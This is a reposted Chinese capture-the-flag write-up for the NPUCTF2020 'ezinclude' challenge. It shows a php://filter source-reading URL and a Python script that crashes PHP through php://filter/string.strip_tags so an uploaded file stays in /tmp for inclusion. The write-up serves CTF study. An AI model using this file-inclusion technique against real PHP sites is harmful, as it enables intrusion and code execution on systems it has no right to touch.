当前位置:网站首页>[NPUCTF2020]ezinclude
[NPUCTF2020]ezinclude
2022-07-26 22:39:00 【茶经新读.】
[NPUCTF2020]ezinclude
f12查看源码发现哈希长度拓展攻击,并发现了hash值
抓包查看一下,发现bp也给了hash
直接pass一下,发现了flflflflag.php
进入flflflflag.php查看一下
发现了404.html,在网页进入的时候真的就出现了404
用伪协议读一下源码:
/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=flflflflag.php
base64解密得到源码,发现过滤了data、input、zip
这时候可以利用:php://filter/string.strip_tags来导致php崩溃,但是可以上传文件保存在/tmp目录,我们直接上传木马,脚本小子火速出击:
import requests
from io import BytesIO
url = "http://daf37d2a-5017-47b7-a42b-71db66a88c63.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
phpfile = "<?php phpinfo(); ?>"
filedata = {
"file":phpfile
}
bak = requests.post(url=url, files=filedata)
print(bak.text)运行了之后,不出意外的页面崩溃了:
进入dir.php查看发现木马已上传:
bp直接查看即可得到flag
边栏推荐
- Two methods of automated testing XSS vulnerabilities using burpsuite
- 啊啊啊啊啊啊啊a
- C语言 求素数、闰年以及最小公倍数最大公约数
- 【Codeforces Round #807 (Div 2.) A·B·C】
- 【AtCoder Beginner Contest 261 (A·B·C·D)】
- Friend友元函数以及单例模式
- In JS, the common writing methods and calling methods of functions - conventional writing, anonymous function writing, taking the method as an object, and adding methods to the object in the construct
- 2022_ SummerBlog_ 008
- 关于Thymeleaf的表达式
- 5_线性回归(Linear Regression)
猜你喜欢
Consistency inspection and evaluation method kappa
V-viewer use
【3. 基础搜索与图论初识】
10个Web API
MySQL associative table queries (reducing the number of queries)
The company gave how to use the IP address (detailed version)
Web middleware log analysis script 2.0 (shell script)
Resolve Microsoft 365 and Visio conflicts
[3. Basic search and first knowledge of graph theory]
Today's 20220719 toss deeplobcut
随机推荐
【4.7 高斯消元详解】
DOM day_02(7.8)网页制作流程、图片src属性、轮播图、自定义属性、标签栏、输入框事件、勾选操作、访问器语法
【Codeforces Round #807 (Div 2.) A·B·C】
[Qt]解决中文乱码问题
DOM day_ 03 (7.11) event bubbling mechanism, event delegation, to-do items, block default events, mouse coordinates, page scrolling events, create DOM elements, DOM encapsulation operations
寻找真凶
[4.1 prime number and linear sieve]
Matlab simulation of image reconstruction using filtered back projection method
[Network Research Institute] attackers scan 1.6 million WordPress websites to find vulnerable plug-ins
DOM day_ 04 (7.12) BOM, open new page (delayed opening), address bar operation, browser information reading, historical operation
细说 call、apply 以及 bind 的区别和用法 20211031
Looking for the real murderer
ES6中的export和import
DOM day_01(7.7) dom的介绍和核心操作
5_线性回归(Linear Regression)
裁剪tif影像
MySQL associative table queries (reducing the number of queries)
C language shutdown applet
【AtCoder Beginner Contest 261 (A·B·C·D)】
【Codeforces Round #807 (Div 2.) A·B·C】